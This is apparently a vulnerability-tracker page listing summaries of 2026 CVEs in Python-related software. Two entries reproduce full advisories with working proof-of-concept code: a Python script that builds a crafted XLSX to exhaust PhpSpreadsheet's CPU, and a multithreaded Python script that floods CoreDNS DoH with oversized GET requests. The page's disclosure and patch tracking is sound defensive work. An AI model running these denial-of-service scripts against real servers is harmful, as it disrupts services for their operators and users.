Skip to main content

Python

2165 CVEs product

Monthly

CVE-2026-43874 PHP HIGH PATCH GHSA This Week

Unauthenticated remote code execution in AVideo ≤29.0 allows attackers to inject and execute arbitrary JavaScript in the browsers of any logged-in users through a WebSocket message relay bypass. An attacker obtains a WebSocket token without authentication from plugin/YPTSocket/getWebSocket.json.php, connects to the WebSocket server, and sends a crafted message with autoEvalCodeOnHTML nested under the json field instead of msg. The incomplete server-side sanitization from prior fix c08694bf6 (GHSA-gph2-j4c9-vhhr) only strips autoEvalCodeOnHTML from $json['msg'], but the relay function msgToResourceId() preferentially selects $msg['json'] as the outbound message carrier. The payload bypasses sanitization, reaches the victim's browser via WebSocket relay, and executes through eval() at plugin/YPTSocket/script.js:573-575. Vendor-released patch: commit 9f3006f9a (recursive stripping across all message carriers). No public exploit identified at time of analysis, but the advisory includes functional proof-of-concept Python code.

PHP CSRF Python XSS RCE +2
NVD GitHub
CVSS 3.1
7.2
EPSS
0.1%
CVE-2026-42045 npm MEDIUM This Month

Stored XSS in LobeChat's message rendering escalates to remote code execution via exposed Electron IPC when victims configure an attacker-controlled LLM provider endpoint. The vulnerability chains unfiltered HTML rendering with an unauthenticated shellCommand IPC handler that executes arbitrary system commands at user privilege level. Confirmed in versions up to 2.1.26; patch released in v2.1.48. Public proof-of-concept demonstrates opening arbitrary applications via malicious LLM API responses.

Python Command Injection XSS RCE
NVD GitHub
CVSS 3.1
6.2
EPSS
0.0%
CVE-2026-42860 PyPI HIGH PATCH GHSA This Week

Server-Side Request Forgery in edx-enterprise 7.0.2-7.0.4 enables Enterprise Admins to steal cloud credentials and scan internal networks. Authenticated users with the Enterprise Admin role-typically delegated to training managers, not platform operators-can inject arbitrary URLs into SAMLProviderConfig.metadata_source and trigger server-side HTTP requests to internal infrastructure. Publicly available exploit code exists (proof-of-concept in GitHub advisory GHSA-64cv-vxpr-j6vc). Vendor-released patch: edx-enterprise 7.0.5. This mirrors a previously patched SSRF in openedx-platform (GHSA-328g-7h4g-r2m9), indicating recurring pattern in SAML metadata handling across Open edX components.

Python SSRF Microsoft
NVD GitHub
CVSS 3.1
8.5
EPSS
0.0%
CVE-2026-40110 PyPI HIGH PATCH GHSA This Week

Cross-Origin Resource Sharing (CORS) bypass in Jupyter Server <= 2.17.0 allows attackers controlling malicious subdomains to bypass origin validation and access sensitive notebook data. The vulnerability stems from incorrect use of Python's re.match() function in the allow_origin_pat configuration, which only anchors at the start of strings. An attacker registering a domain like 'trusted.example.com.evil.com' can pass validation intended only for 'trusted.example.com', enabling unauthorized cross-origin requests to Jupyter sessions. Fixed in version 2.18.0 via commits 057869a and 49b3439. No active exploitation or public POC identified at time of analysis.

Python Information Disclosure
NVD GitHub VulDB
CVSS 4.0
7.6
EPSS
0.0%
CVE-2026-35192 PyPI LOW PATCH Monitor

Django 6.0 before 6.0.5 and 5.2 before 5.2.14 fail to vary response headers on session cookies when SESSION_SAVE_EVERY_REQUEST is enabled but the session is unmodified, allowing remote attackers with user interaction to steal session tokens from cached public pages. The vulnerability affects server configurations that cache responses aggressively while maintaining per-request session handling, exposing authenticated users to session hijacking after visiting pages served from cache.

Python Information Disclosure
NVD VulDB
CVSS 4.0
2.3
EPSS
0.1%
CVE-2026-6907 PyPI LOW PATCH Monitor

Django's UpdateCacheMiddleware incorrectly caches HTTP responses containing a Vary header with an asterisk value in versions 6.0 before 6.0.5 and 5.2 before 5.2.14, causing private user data to be cached and served to other users. The vulnerability has low confidentiality impact and requires user interaction (UI:P) combined with passive attack timing, making real-world exploitation dependent on specific cache timing conditions and application architecture.

Python Information Disclosure
NVD VulDB
CVSS 4.0
2.3
EPSS
0.0%
CVE-2026-5766 PyPI MEDIUM PATCH This Month

Django 6.0 before 6.0.5 and 5.2 before 5.2.14 allow remote attackers to bypass the FILE_UPLOAD_MAX_MEMORY_SIZE limit by submitting ASGI requests with missing or understated Content-Length headers, potentially loading large files into memory and causing denial of service through resource exhaustion. No active exploitation confirmed, but the vulnerability requires only network access and no authentication, making it trivially exploitable once the bypass is understood.

Authentication Bypass Python Suse Red Hat
NVD VulDB
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-7810 MEDIUM POC This Month

Path traversal in UsamaK98 python-notebook-mcp allows remote unauthenticated attackers to read, write, and manipulate notebook files outside their intended directory via crafted input to the create_notebook, read_notebook, edit_cell, and add_cell functions in server.py. Public exploit code is available. The project uses rolling releases with no versioning, and the vendor has not yet responded to the initial issue report despite early notification.

Python Path Traversal
NVD VulDB GitHub
CVSS 4.0
5.5
EPSS
0.0%
CVE-2026-42313 PyPI HIGH PATCH GHSA This Week

Authenticated users with non-admin SETTINGS permission in pyload-ng ≤0.5.0b3.dev99 can redirect all outbound HTTP traffic through attacker-controlled proxies by modifying ungated proxy configuration fields (enabled, host, port, type). The vulnerability is an incomplete fix in a series of authorization bypass issues (CVE-2026-33509/-35463/-35464/-35586) where a hand-maintained allowlist in set_config_value() gates only proxy credentials (username/password) but not the proxy destination itself, allowing credential theft, traffic interception, and response injection across downloads, captcha solvers, and update checks. No public exploit identified at time of analysis, though the GitHub advisory includes a working proof-of-concept demonstrating traffic redirection via API calls. Patch confirmed in version 0.5.0b3.dev100 per vendor advisory GHSA-pg67-9wjv-mr85.

Python Information Disclosure
NVD GitHub
CVSS 3.1
8.3
EPSS
0.0%
CVE-2026-42312 PyPI MEDIUM PATCH GHSA This Month

Non-admin users holding the SETTINGS permission in pyload-ng can disable TLS peer and hostname verification by setting general.ssl_verify=off via the set_config_value() API, enabling man-in-the-middle attacks on all outbound HTTPS requests including downloads, captcha fetches, and plugin calls. This is an incomplete fix for a series of prior allowlist bypasses (CVE-2026-33509, CVE-2026-35463, CVE-2026-35464, CVE-2026-35586) in which security-sensitive configuration options were omitted from the ADMIN_ONLY_CORE_OPTIONS allowlist.

Python SSRF Privilege Escalation
NVD GitHub VulDB
CVSS 3.1
6.8
EPSS
0.0%
CVE-2026-42601 PyPI CRITICAL GHSA Act Now

Remote code execution in ArchiveBox <= 0.8.6rc0 allows unauthenticated attackers to execute arbitrary commands on the server via unvalidated config injection in the /add/ endpoint. When PUBLIC_ADD_VIEW=True (common for bookmarklet usage), attackers inject malicious environment variables through the config JSON parameter that propagate to archive plugins like yt-dlp and gallery-dl, enabling command execution via --exec flags. The endpoint lacks both input validation and CSRF protection. CVSS 9.3 (Critical) with network vector, low complexity, and no authentication required. Public proof-of-concept exploit exists demonstrating pre-authentication RCE. No vendor-released patch identified at time of analysis.

Python RCE
NVD GitHub VulDB
CVSS 4.0
9.3
EPSS
0.0%
CVE-2026-42333 Maven MEDIUM PATCH GHSA This Month

Quarkus OpenAPI Generator versions before 2.16.0-lts and 2.16.0 (fixed in 2.17.0) send authentication credentials to unintended API endpoints due to overly broad path-parameter regex matching. The generated authentication filter treats OpenAPI path-template placeholders like {param} as .* patterns, allowing a single parameter to consume forward slashes and match multiple distinct operations. This causes bearer tokens, OAuth tokens, API keys, and basic credentials configured for one protected operation to be leaked to different, unprotected operations on the same service when a client invokes them through normal generated-code paths. No public exploit code has been identified, but the vulnerability is trivial to trigger and affects all authentication schemes relying on the shared path-matching logic.

Python Information Disclosure Apache Java
NVD GitHub
CVSS 4.0
6.3
EPSS
0.1%
CVE-2026-42311 PyPI HIGH PATCH GHSA This Week

Integer overflow in Pillow 10.3.0 through 12.1.1 bypasses bounds checks during PSD tile extent validation, enabling memory corruption and arbitrary code execution when processing malicious PSD files. This vulnerability (CVE-2026-42311) exploits an incomplete fix for CVE-2026-25990, where the original patch added tile extent validation but used overflow-prone integer types. Attackers craft PSD images with tile dimensions that wrap around during extent sum calculations, defeating the bounds checks and triggering out-of-bounds writes in decode.c and encode.c. Pillow 12.2.0 patches this by avoiding extent addition before comparison. No active exploitation confirmed (not in CISA KEV); publicly available exploit code exists via proof-of-concept test images in the patch commit.

Integer Overflow RCE Buffer Overflow Python
NVD GitHub VulDB
CVSS 4.0
8.6
EPSS
0.0%
CVE-2026-42310 PyPI MEDIUM PATCH GHSA This Month

Pillow's PDF parser enters an infinite loop when processing maliciously crafted PDF files with circular Prev pointer references in trailer sections, causing 100% CPU consumption and application hang. All versions from 4.2.0 through 12.1.x are affected. The vulnerability is a denial-of-service condition affecting any application using Pillow to parse untrusted PDFs. Vendor-released patch: version 12.2.0.

Denial Of Service Python Red Hat Suse
NVD GitHub VulDB
CVSS 4.0
5.1
EPSS
0.0%
CVE-2026-41181 Go MEDIUM PATCH GHSA This Month

Traefik's errors middleware discloses sensitive HTTP headers including Authorization and Cookie to separate error page services when backends return configured error status codes. Affected versions are Traefik v2.11.43 and earlier, v3.6.14 and earlier, and v3.7.0-rc.0 through v3.7.0-rc.2. The vulnerability allows credentials meant only for backend services to be forwarded to distinct error page infrastructure, expanding exposure across service boundaries. Vendor-released patches are available; actively exploited status not confirmed.

Python Docker Information Disclosure Red Hat
NVD GitHub VulDB
CVSS 4.0
6.9
EPSS
0.0%
CVE-2026-40195 Go HIGH PATCH GHSA This Week

Nil-pointer dereference in Incus daemon's storage bucket import logic allows authenticated users to crash the daemon by submitting a malformed bucket backup archive with a missing config section in index.yaml, enabling denial of service through repeated exploitation. The vulnerability affects Incus versions prior to 7.0.0 and requires valid storage bucket feature access but no special privileges beyond authenticated user status.

Null Pointer Dereference Denial Of Service Python Suse
NVD GitHub
CVSS 4.0
7.1
EPSS
0.0%
CVE-2026-42088 LIB CRITICAL PATCH Act Now

Privilege escalation in OpenC3 COSMOS allows low-privileged authenticated users to bypass API authorization and perform administrative actions by executing crafted Python or Ruby scripts via the Script Runner widget. Attackers can directly access Redis database (exposing secrets and configuration settings) and the MinIO buckets service (containing logs, configs, and plugins) due to unrestricted container-to-container network access in the Docker deployment. Vendor-released patch available in version 7.0.0-rc3 and confirmed in 7.0.0 stable release. EPSS data not available; no CISA KEV listing indicates targeted rather than widespread exploitation. CVSS 9.6 (Critical) with scope change reflects the container escape-like privilege boundary violation.

Privilege Escalation Redis Python Docker
NVD GitHub VulDB
CVSS 3.1
9.6
EPSS
0.0%
CVE-2026-42796 CRITICAL PATCH Act Now

Remote code execution in Arelle webserver (versions prior to 2.39.10) allows unauthenticated attackers to execute arbitrary Python code by submitting malicious plugin URLs to the /rest/configure endpoint. The vulnerability stems from the webserver's plugin manager accepting and executing external Python files without authentication or URL validation. A patch is available in version 2.39.10 (GitHub PR #2320). CVSS 9.8 with network vector, no privileges required, and EPSS data not provided. No CISA KEV listing or confirmed active exploitation at time of analysis.

Authentication Bypass Python RCE
NVD GitHub
CVSS 4.0
9.2
EPSS
0.3%
CVE-2026-42079 PyPI HIGH PATCH GHSA This Week

Arbitrary code execution in PPTAgent allows local attackers to execute Python code by exploiting unsafe eval() of LLM-generated content with unrestricted builtins. The framework's agentic architecture passes AI-generated code directly to eval() with full builtin access, enabling execution of arbitrary system commands. Patch available via commit 418491a which restricts eval() globals to an empty builtins dictionary and adds path traversal protections. CVSS 8.6 with local attack vector and user interaction requirement; no evidence of active exploitation or public POC at time of analysis.

RCE Python Code Injection
NVD GitHub
CVSS 3.1
8.6
EPSS
0.0%
CVE-2026-29514 HIGH POC This Week

Remote code execution in NetBox 4.3.5-4.5.4 allows authenticated users with exporttemplate or configtemplate permissions to execute arbitrary Python code as the NetBox service user by injecting malicious callables into Jinja2 template environment parameters. Attackers bypass SandboxedEnvironment protections by setting the finalize parameter to dangerous imports like subprocess.getoutput, which executes on every rendered expression outside sandbox call interception. Public proof-of-concept exploit exists (chocapikk.com), and upstream patch available via GitHub PR #22078 implements an allowlist-based validation mechanism that blocks unauthorized callable resolution at both save-time and render-time.

Python RCE
NVD GitHub VulDB
CVSS 4.0
8.7
EPSS
0.0%
CVE-2026-7669 PyPI MEDIUM This Month

Unsafe deserialization in SGLang's HuggingFace Transformer Handler allows remote attackers to trigger deserialization attacks via the get_tokenizer function in versions up to 0.5.9, potentially leading to code execution or information disclosure. The vulnerability requires high attack complexity and has not been patched despite early vendor notification.

Python Deserialization
NVD VulDB GitHub
CVSS 4.0
6.3
EPSS
0.0%
CVE-2026-7584 HIGH PATCH This Week

Unsafe deserialization in Zurich Instruments LabOne Q enables arbitrary code execution when users load malicious experiment files. The import_cls mechanism accepts unvalidated class names from serialized data, allowing attackers to instantiate arbitrary Python classes with controlled constructor arguments. Exploitation requires user interaction to open a crafted file, making this a credible vector for supply chain attacks via shared experiment configurations or support tickets. CVSS 8.4 reflects local attack vector with user interaction requirement. No confirmed active exploitation or public POC at time of analysis.

Python Deserialization RCE
NVD
CVSS 4.0
8.4
EPSS
0.0%
CVE-2026-43003 PyPI HIGH PATCH GHSA This Week

Arbitrary code execution in OpenStack ironic-python-agent (IPA) versions 1.0.0 through 11.5.0 occurs because IPA runs grub-install from inside a chroot of the partition image it is deploying, so binaries supplied by a malicious image execute on the provisioning ramdisk. An attacker able to have a crafted partition image deployed can run code in the IPA context (typically root on the bare-metal node being provisioned). No public exploit identified at time of analysis; EPSS is negligible (0.01%) and CISA SSVC records exploitation status as none, but the technical impact is rated total.

Python RCE Ironic Python Agent
NVD GitHub VulDB
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-41654 PyPI MEDIUM PATCH GHSA This Month

Authenticated Server-Side Request Forgery (SSRF) in Weblate before 5.17.1 allows users with project.add permission to import crafted project backup ZIPs containing malicious repository URLs pointing to private addresses or using non-allowlisted schemes (file://, git://) that bypass URL validation. The vulnerability exists because bulk_create() circumvents Django's full_clean() validator; attackers can write arbitrary URLs into .git/config, enabling SSRF attacks against internal systems or protocol exploitation.

Python Authentication Bypass Suse
NVD GitHub
CVSS 4.0
5.3
EPSS
0.1%
CVE-2026-41016 PyPI MEDIUM PATCH This Month

Apache Airflow's SmtpHook performs STARTTLS upgrades without SSL certificate validation, allowing man-in-the-middle attackers to intercept SMTP credentials. Remote unauthenticated attackers positioned between an Airflow worker and SMTP server can present a self-signed certificate, complete the TLS handshake, and capture login credentials sent after the upgrade. The vulnerability affects apache-airflow-providers-smtp versions 2.0.0 through 2.x and is patched in version 3.0.0 or later. No public exploit code identified at time of analysis, but EPSS score of 0.01% indicates low real-world exploitation probability despite confidentiality impact.

Apache Python Information Disclosure
NVD GitHub
CVSS 3.1
5.9
EPSS
0.0%
CVE-2025-13030 PyPI LOW Monitor

Remote code execution in django-mdeditor (all versions prior to commit 3e80f9e) allows unauthenticated attackers to upload malicious files via the image upload endpoint. The vulnerability combines missing authentication (CWE-306) with insufficient filename sanitization, enabling arbitrary code execution when uploaded files are accessed. Exploit code is publicly available (CVSS E:P), though user interaction is required (UI:R). EPSS data not available, not listed in CISA KEV at time of analysis.

Authentication Bypass RCE Python
NVD GitHub VulDB
CVSS 4.0
2.0
EPSS
0.1%
CVE-2026-41662 PHP MEDIUM PATCH GHSA This Month

Admidio 5.0.8 and earlier allows authenticated administrators to remove all other administrators from the system via Role::stopMembership(), which lacks a minimum-administrator-count validation check. Two colluding or compromised admin accounts can sequentially remove each other, leaving zero administrators and locking administrative access. The vulnerability requires high privileges (PR:H) and user interaction (UI:R) but results in complete denial of administrative access once exploited.

PHP Authentication Bypass Python
NVD GitHub
CVSS 3.1
5.2
EPSS
0.0%
CVE-2026-42234 npm HIGH PATCH GHSA This Week

Sandbox escape in n8n's Python Task Runner enables authenticated workflow editors to execute arbitrary code on the task runner container. This vulnerability (CWE-94: Improper Control of Generation of Code) affects n8n instances with the Python Code Node feature enabled, allowing attackers with workflow creation/modification permissions to break out of the Python sandbox. Vendor-released patches are available in versions 1.123.32, 2.17.4, and 2.18.1. No public exploit identified at time of analysis, though the technical details in the GitHub advisory provide sufficient information for exploitation by authenticated users.

RCE Python Code Injection
NVD GitHub VulDB
CVSS 4.0
7.1
EPSS
0.1%
CVE-2026-41255 PyPI MEDIUM PATCH GHSA This Month

CKAN versions 2.10.0 through 2.10.9 and 2.11.0 through 2.11.4 allow unauthenticated requests to permanently disable CSRF protection on endpoints for the lifetime of the server process by triggering a state mutation in the flask-wtf CSRFProtect middleware. Combined with cross-site scripting, an attacker can exploit this to perform authenticated actions using other users' credentials. The vulnerability affects network-accessible CKAN instances with default configurations and has CVSS 6.1 with user interaction required.

XSS CSRF Python
NVD GitHub
CVSS 3.1
6.1
EPSS
0.0%
CVE-2026-40902 PHP HIGH PATCH GHSA This Week

## Summary The XLSX reader's `ColumnAndRowAttributes::readRowAttributes()` method reads row numbers from XML attributes without validating them against the spreadsheet maximum row limit (`AddressRange::MAX_ROW = 1,048,576`). An attacker can craft a minimal XLSX file (~1.6KB) containing a `<row r="999999999"/>` element that inflates `cachedHighestRow` to 999,999,999, causing any subsequent row iteration to attempt ~1 billion loop cycles and exhaust CPU resources. ## Details In `src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php` at line 216, the row index is cast directly from XML without bounds checking: ```php // ColumnAndRowAttributes.php:216 $rowIndex = (int) $row['r']; // No validation against AddressRange::MAX_ROW ``` This value flows through `setRowAttributes()` (line 126) → `$this->worksheet->getRowDimension($rowNumber)` (line 60), which updates the cached highest row in `Worksheet.php:1348`: ```php // Worksheet.php:1342-1349 public function getRowDimension(int $row): RowDimension { if (!isset($this->rowDimensions[$row])) { $this->rowDimensions[$row] = new RowDimension($row); $this->cachedHighestRow = max($this->cachedHighestRow, $row); } return $this->rowDimensions[$row]; } ``` The inflated `cachedHighestRow` is then returned by `getHighestRow()` (line 1099) and used as the default end bound in `RowIterator::resetEnd()` (RowIterator.php:86): ```php // RowIterator.php:86 $this->endRow = $endRow ?: $this->subject->getHighestRow(); ``` Notably, column attributes already have equivalent validation at line 161 (`AddressRange::MAX_COLUMN_INT`), and cell coordinates are validated in `Coordinate::coordinateFromString()` (line 40) against `MAX_ROW`. The row dimension attribute path bypasses both of these checks. ## PoC **Step 1: Create the malicious XLSX file (~1.6KB)** ```python import zipfile import io content_types = '<?xml version="1.0" encoding="UTF-8"?><Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types"><Default Extension="rels" ContentType="application/vnd.openxmlformats-package.relationships+xml"/><Default Extension="xml" ContentType="application/xml"/><Override PartName="/xl/workbook.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.sheet.main+xml"/><Override PartName="/xl/worksheets/sheet1.xml" ContentType="application/vnd.openxmlformats-officedocument.spreadsheetml.worksheet+xml"/></Types>' rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/officeDocument" Target="xl/workbook.xml"/></Relationships>' workbook = '<?xml version="1.0" encoding="UTF-8"?><workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships"><sheets><sheet name="Sheet1" sheetId="1" r:id="rId1"/></sheets></workbook>' wb_rels = '<?xml version="1.0" encoding="UTF-8"?><Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/worksheet" Target="worksheets/sheet1.xml"/></Relationships>' sheet = '<?xml version="1.0" encoding="UTF-8"?><worksheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main"><sheetData><row r="1"><c r="A1"><v>1</v></c></row><row r="999999999" ht="15"/></sheetData></worksheet>' with zipfile.ZipFile('dos_row.xlsx', 'w', zipfile.ZIP_DEFLATED) as zf: zf.writestr('[Content_Types].xml', content_types) zf.writestr('_rels/.rels', rels) zf.writestr('xl/workbook.xml', workbook) zf.writestr('xl/_rels/workbook.xml.rels', wb_rels) zf.writestr('xl/worksheets/sheet1.xml', sheet) print("Created dos_row.xlsx") ``` **Step 2: Load with PhpSpreadsheet (CPU exhaustion)** ```php <?php require 'vendor/autoload.php'; use PhpOffice\PhpSpreadsheet\IOFactory; $reader = IOFactory::createReader('Xlsx'); $spreadsheet = $reader->load('dos_row.xlsx'); $sheet = $spreadsheet->getActiveSheet(); echo "Highest row: " . $sheet->getHighestRow() . "\n"; // Output: Highest row: 999999999 // This will consume CPU for ~144 seconds (999M iterations) foreach ($sheet->getRowIterator() as $row) { // CPU exhaustion } ``` **Expected output:** `getHighestRow()` returns 999999999. Any row iteration hangs indefinitely. ## Impact - **CPU Denial of Service:** A 1.6KB crafted XLSX file causes ~999 million loop iterations in any application that iterates rows using `getRowIterator()` or uses `getHighestRow()` as a loop bound. Estimated CPU burn is ~144 seconds per file. - **Memory Exhaustion:** Applications that accumulate data during iteration (e.g., importing rows into a database, building arrays) will also exhaust memory. - **Amplification:** The ratio of input size to resource consumption is extreme - 1,580 bytes triggers nearly 1 billion iterations. - **Common Attack Surface:** PhpSpreadsheet is widely used in web applications that accept user-uploaded spreadsheets for import/processing, making this easily exploitable remotely. ## Recommended Fix Add row bounds validation in `readRowAttributes()` at line 216, matching the column validation pattern already present at line 161: ```php // src/PhpSpreadsheet/Reader/Xlsx/ColumnAndRowAttributes.php:216 // Before: $rowIndex = (int) $row['r']; // After: $rowIndex = (int) $row['r']; if ($rowIndex < 1 || $rowIndex > AddressRange::MAX_ROW) { continue; } ``` The `AddressRange` import is already present at line 5 of this file. This fix is consistent with the existing cell coordinate validation in `Coordinate::coordinateFromString()` and the column validation at line 161.

PHP Python Denial Of Service
NVD GitHub
CVSS 3.1
7.5
EPSS
0.0%
CVE-2026-7466 HIGH PATCH This Week

AgentFlow contains an arbitrary code execution vulnerability that allows attackers to execute local Python pipeline files by supplying a user-controlled pipeline_path parameter to the POST /api/runs and POST /api/runs/validate endpoints. Attackers can induce requests to the local AgentFlow API to load and execute existing Python pipeline files on disk, resulting in code execution in the context of the user running AgentFlow.

Python Code Injection RCE
NVD GitHub VulDB
CVSS 4.0
7.7
EPSS
0.0%
CVE-2026-30893 CRITICAL POC PATCH Act Now

Wazuh Manager (4.4.0 through 4.14.3) contains a path traversal vulnerability in the cluster synchronization routine that allows an authenticated cluster peer to write arbitrary files outside the intended extraction directory on other cluster nodes. Writing to sensitive locations such as cron directories or Python module paths leads to remote code execution. CVSS 9.0 Critical (network-accessible, high privilege required, scope changed). Patch available in v4.14.4; no active exploitation identified.

RCE Python Path Traversal Wazuh
NVD GitHub VulDB
CVSS 3.1
9.0
EPSS
0.1%
CVE-2026-32936 Go HIGH PATCH GHSA This Week

### Summary CoreDNS's DNS-over-HTTPS (DoH) GET path accepts oversized `dns=` query values and performs substantial request parsing, query unescaping, base64 decoding, and message unpacking work before returning `400 Bad Request`. A remote, unauthenticated attacker can repeatedly send oversized DoH GET requests to `/dns-query?dns=...` and force high CPU usage, large transient allocations, elevated garbage-collection pressure, and increased resident memory consumption even though the requests are ultimately rejected. This is a denial-of-service issue caused by expensive pre-validation processing on the DoH GET path. ### Details The vulnerable flow is in `plugin/pkg/doh/doh.go`: - `RequestToMsg()` dispatches GET requests to `requestToMsgGet()`: - `plugin/pkg/doh/doh.go:79-89` - `requestToMsgGet()` calls `req.URL.Query()`, extracts `dns`, and passes it directly to `base64ToMsg()`: - `plugin/pkg/doh/doh.go:99-108` - `base64ToMsg()` decodes the full attacker-controlled value via `b64Enc.DecodeString()` and only then attempts to unpack it into a DNS message: - `plugin/pkg/doh/doh.go:121-130` Relevant snippet: ```go func requestToMsgGet(req *http.Request) (*dns.Msg, error) { values := req.URL.Query() b64, ok := values["dns"] if !ok { return nil, fmt.Errorf("no 'dns' query parameter found") } if len(b64) != 1 { return nil, fmt.Errorf("multiple 'dns' query values found") } return base64ToMsg(b64[0]) } func base64ToMsg(b64 string) (*dns.Msg, error) { buf, err := b64Enc.DecodeString(b64) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ```` By contrast, the POST path applies a bounded read before unpacking: ```go func toMsg(r io.ReadCloser) (*dns.Msg, error) { buf, err := io.ReadAll(http.MaxBytesReader(nil, r, 65536)) if err != nil { return nil, err } m := new(dns.Msg) err = m.Unpack(buf) return m, err } ``` So, POST is explicitly size-bounded, while GET is not equivalently bounded before expensive parsing and decoding work occurs. In addition, the HTTPS server is created in `core/dnsserver/server_https.go:87-92` without an explicit early GET-path size guard in this path: ```go srv := &http.Server{ ReadTimeout: s.ReadTimeout, WriteTimeout: s.WriteTimeout, IdleTimeout: s.IdleTimeout, ErrorLog: stdlog.New(&loggerAdapter{}, "", 0), } ``` As a result, oversized DoH GET request targets are processed through: 1. HTTP request-line parsing 2. URL query parsing / unescaping 3. DoH GET extraction 4. base64 decoding 5. DNS message unpacking before the request is rejected. ### Root cause The root cause is missing early size validation on the DoH GET path. More specifically: * `requestToMsgGet()` performs `req.URL.Query()` on attacker-controlled oversized request targets. * The extracted `dns` value is passed to `base64ToMsg()` without an encoded-length or decoded-length bound. * `base64ToMsg()` fully decodes the attacker-controlled string before any DNS-size rejection. * The POST path already has an explicit bounded read, but GET does not have an equivalent pre-decode bound. This creates a pre-validation resource-amplification path for DoH GET. ### PoC #### Local test setup This was reproduced locally against CoreDNS 1.14.2 over HTTPS with `pprof` enabled. Create a self-signed certificate: ```bash openssl req -x509 -newkey rsa:2048 -sha256 -days 1 -nodes \ -keyout key.pem -out cert.pem \ -subj "/CN=127.0.0.1" ``` Create this `Corefile`: ```txt https://127.0.0.1:8443 { whoami log errors tls cert.pem key.pem pprof 127.0.0.1:6060 } ``` Run CoreDNS: ```bash ./coredns -conf Corefile ``` #### Proof-of-concept script ```python #!/usr/bin/env python3 import argparse import base64 import collections import concurrent.futures import http.client import ssl import time def send_one(host, port, path, timeout): ctx = ssl._create_unverified_context() conn = http.client.HTTPSConnection(host, port, timeout=timeout, context=ctx) try: conn.request("GET", path, headers={ "Accept": "application/dns-message", "Connection": "close", }) resp = conn.getresponse() resp.read() return resp.status except Exception as e: return f"ERR:{type(e).__name__}" finally: try: conn.close() except Exception: pass def main(): ap = argparse.ArgumentParser() ap.add_argument("--host", default="127.0.0.1") ap.add_argument("--port", type=int, default=8443) ap.add_argument("--decoded-kib", type=int, default=720) ap.add_argument("--workers", type=int, default=64) ap.add_argument("--requests", type=int, default=5000) ap.add_argument("--timeout", type=float, default=5.0) args = ap.parse_args() raw = b"A" * (args.decoded_kib * 1024) b64 = base64.urlsafe_b64encode(raw).rstrip(b"=").decode() path = "/dns-query?dns=" + b64 print(f"[+] target = https://{args.host}:{args.port}") print(f"[+] decoded bytes = {len(raw):,}") print(f"[+] encoded chars = {len(b64):,}") print(f"[+] request-target length = {len(path):,}") print(f"[+] workers = {args.workers}, requests = {args.requests}") print("[+] 400 responses are expected; the issue is expensive processing before rejection.\n") started = time.time() results = collections.Counter() with concurrent.futures.ThreadPoolExecutor(max_workers=args.workers) as ex: futs = [ ex.submit(send_one, args.host, args.port, path, args.timeout) for _ in range(args.requests) ] for i, fut in enumerate(concurrent.futures.as_completed(futs), 1): results[fut.result()] += 1 if i % 10 == 0 or i == args.requests: print(f"[{i}/{args.requests}] {dict(results)}") elapsed = time.time() - started print("\n[+] done") print(f"[+] elapsed = {elapsed:.2f}s") print(f"[+] summary = {dict(results)}") if __name__ == "__main__": main() ``` Run the PoC: ```bash python3 poc_doh_get_oversize_https.py \ --host 127.0.0.1 \ --port 8443 \ --decoded-kib 720 \ --workers 64 \ --requests 5000 ``` #### Profiling commands used during reproduction CPU profile: ```bash (curl -s "http://127.0.0.1:6060/debug/pprof/profile?seconds=20" -o cpu_attack.pb.gz &) ; \ sleep 1 ; \ python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 ; \ wait go tool pprof -top ./coredns cpu_attack.pb.gz ``` Heap / allocation profiles: ```bash curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_before.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_before.pb.gz python3 poc_doh_get_oversize_https.py --host 127.0.0.1 --port 8443 --decoded-kib 720 --workers 64 --requests 5000 curl -s http://127.0.0.1:6060/debug/pprof/heap -o heap_after.pb.gz curl -s http://127.0.0.1:6060/debug/pprof/allocs -o allocs_after.pb.gz go tool pprof -top -base heap_before.pb.gz ./coredns heap_after.pb.gz go tool pprof -top -base allocs_before.pb.gz ./coredns allocs_after.pb.gz ``` ### Reproduction results The issue was confirmed using the following: * CoreDNS 1.14.2 * linux/amd64 * go1.26.1 PoC payload characteristics: * decoded payload size: `737,280 bytes` * base64url-encoded `dns` length: `983,040` * request-target length: `983,055` Observed request outcome: * `5000 / 5000` requests returned `400 Bad Request` * total runtime for the 5000-request run: `18.22s` The important point is that the requests are rejected only after expensive processing has already happened. #### CPU profile highlights The CPU profile captured during the attack showed significant time in: * `net/http.readRequest` * `net/url.ParseQuery` / `net/url.QueryUnescape` / `net/url.unescape` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` * `encoding/base64.(*Encoding).DecodeString` * Go GC worker paths Representative cumulative values from the captured profile included: * `github.com/coredns/coredns/core/dnsserver.(*ServerHTTPS).ServeHTTP` → `10.91s` * `github.com/coredns/coredns/plugin/pkg/doh.RequestToMsg` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.requestToMsgGet` → `10.88s` * `github.com/coredns/coredns/plugin/pkg/doh.base64ToMsg` → `3.50s` * `encoding/base64.(*Encoding).DecodeString` → `3.46s` * `net/http.readRequest` → `10.57s` * `net/url.(*URL).Query` / `ParseQuery` / `QueryUnescape` → `7.38s` * `runtime.gcBgMarkWorker` and related GC paths were also heavily active This demonstrates that the issue is not limited to final DNS unpacking. The oversized GET request forces meaningful work in HTTP parsing, URL handling, base64 decoding, and garbage collection before rejection. #### Allocation profile highlights Allocation profiling showed very large transient allocation volume caused by the rejected requests: * total `alloc_space`: `26,756.48 MB` Top contributors included: * 